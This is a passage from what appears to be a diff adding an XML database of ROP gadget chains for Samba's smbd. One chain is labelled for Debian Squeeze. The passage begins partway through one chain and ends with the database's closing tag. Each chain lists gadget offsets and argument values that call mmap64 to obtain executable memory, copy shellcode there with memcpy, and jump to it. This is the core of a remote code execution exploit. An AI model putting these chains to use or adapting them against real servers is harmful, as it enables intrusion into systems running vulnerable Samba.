<gadget offset="0x001b1fe0">mov edx, eax ; mov eax, edx ; ret || edx = eax = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
|
|
378
|
+
<gadget offset="0x000e817f">push esp ; pop ebx ; pop ebp ; ret || ebx = esp</gadget>
|
|
379
|
+
<gadget value ="0x00000000">junk for ebp</gadget>
|
|
380
|
+
<gadget offset="0x0000cdea">xchg eax, ebx ; ret || eax = esp</gadget>
|
|
381
|
+
<gadget offset="0x00277540">pop ebp ; ret</gadget>
|
|
382
|
+
<gadget value ="0x0000003c">value to add to esp to point to shellcode</gadget>
|
|
383
|
+
<gadget offset="0x0011d3a6">add eax, ebp ; mov ebx, 0x81FFF807 ; ret </gadget>
|
|
384
|
+
<gadget offset="0x0000cdea">xchg eax, ebx ; ret || ebx = esp + XX == src in memcpy</gadget>
|
|
385
|
+
<gadget offset="0x0000f445">pop eax; ret</gadget>
|
|
386
|
+
<gadget offset="0x008c0964">memcpy@got</gadget>
|
|
387
|
+
<gadget offset="0x00348bb7">mov eax, dword [eax] ; ret || eax = @memcpy</gadget>
|
|
388
|
+
<gadget offset="0x0000cdea">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
|
|
389
|
+
<gadget offset="0x0009ee99">pop edi ; pop ebp **1** ; ret</gadget>
|
|
390
|
+
<gadget offset="0x00148cc6">add esp, 0x4 ; pop esi ; pop ebp ; ret || with pushad, will permit ret on ebx == memcpy</gadget>
|
|
391
|
+
<gadget value ="0x00000000">junk for ebp **1** </gadget>
|
|
392
|
+
<gadget offset="0x0000dbcf">pushad, ret</gadget>
|
|
393
|
+
<gadget value ="size">payload size</gadget>
|
|
394
|
+
</gadgets>
|
|
395
|
+
-->
|
|
396
|
+
<!-- ROP CHAIN for smbd 2:3.5.6~dfsg-3squeeze6
|
|
397
|
+
<compatibility
|
|
398
|
+
<target>Debian Squeeze / 2:3.5.6~dfsg-3squeeze6</target>
|
|
399
|
+
</compatibility>
|
|
400
|
+
<gadgets base="0">
|
|
401
|
+
<gadget offset="0x00021cd9">pop eax; ret</gadget>
|
|
402
|
+
<gadget offset="0x008cf86c">mmap64@got</gadget>
|
|
403
|
+
<gadget offset="0x002fd4a7">mov eax, dword [eax] ; ret || eax = @mmap64</gadget>
|
|
404
|
+
<gadget offset="0x000234e5">jmp eax</gadget>
|
|
405
|
+
<gadget offset="0x000b0331">add esp, 0x14; pop ebx; pop ebp; ret || mmap64 ret, skip overt mmap arguments</gadget>
|
|
406
|
+
<gadget value ="0x00000000">mmap arg : addr</gadget>
|
|
407
|
+
<gadget value ="0x00001000">mmap arg : size</gadget>
|
|
408
|
+
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
|
|
409
|
+
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
|
|
410
|
+
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
|
|
411
|
+
<gadget value ="0x00000000">mmap arg : off64_t part 1</gadget>
|
|
412
|
+
<gadget value ="0x00000000">mmap arg : off64_t part 2</gadget>
|
|
413
|
+
<gadget offset="0x0001cf12">pop edx ; ret</gadget>
|
|
414
|
+
<gadget offset="0x008d6000">edx = writable location, in GOT</gadget>
|
|
415
|
+
<gadget offset="0x00353f4c">mov dword [edx], eax ; pop ebp ; ret; || save EAX (mmaped addr) in GOT</gadget>
|
|
416
|
+
<gadget value ="0x00000000">junk for ebp</gadget>
|
|
417
|
+
<gadget offset="0x000b98e9">mov ecx, eax; mov eax, ecx; ret || ecx = MMAPed addr, dst in memcpy</gadget>
|
|
418
|
+
<gadget offset="0x006bffd2">mov edx, ecx ; mov eax, edx ; pop ebp ; ret || edx = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
|
|
419
|
+
<gadget value ="0x00000000">junk for ebp</gadget>
|
|
420
|
+
<gadget offset="0x003660e4">push esp ; pop ebx ; pop ebp ; ret || ebx = esp</gadget>
|
|
421
|
+
<gadget value ="0x00000000">junk for ebp</gadget>
|
|
422
|
+
<gadget offset="0x00394107">pop ebp ; ret</gadget>
|
|
423
|
+
<gadget value ="0x00000034">value to add to esp to point to shellcode</gadget>
|
|
424
|
+
<gadget offset="0x0017892d">add ebx, ebp ; ret || ebx = src in memcpy</gadget>
|
|
425
|
+
<gadget offset="0x00021cd9">pop eax; ret</gadget>
|
|
426
|
+
<gadget offset="0x008cf1e8">memcpy@got</gadget>
|
|
427
|
+
<gadget offset="0x002fd4a7">mov eax, dword [eax] ; ret || eax = @memcpy</gadget>
|
|
428
|
+
<gadget offset="0x0001f666">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
|
|
429
|
+
<gadget offset="0x000b9ac5">pop edi ; pop ebp **1** ; ret</gadget>
|
|
430
|
+
<gadget offset="0x0033e7ea">add esp, 0x4 ; pop esi ; pop ebp ; ret || with pushad, will permit ret on ebx == memcpy</gadget>
|
|
431
|
+
<gadget value ="0x00000000">junk for ebp **1** </gadget>
|
|
432
|
+
<gadget offset="0x00020453">pushad, ret</gadget>
|
|
433
|
+
<gadget value ="size">payload size</gadget>
|
|
434
|
+
</gadgets>
|
|
435
|
+
-->
|
|
436
|
+
</db>
|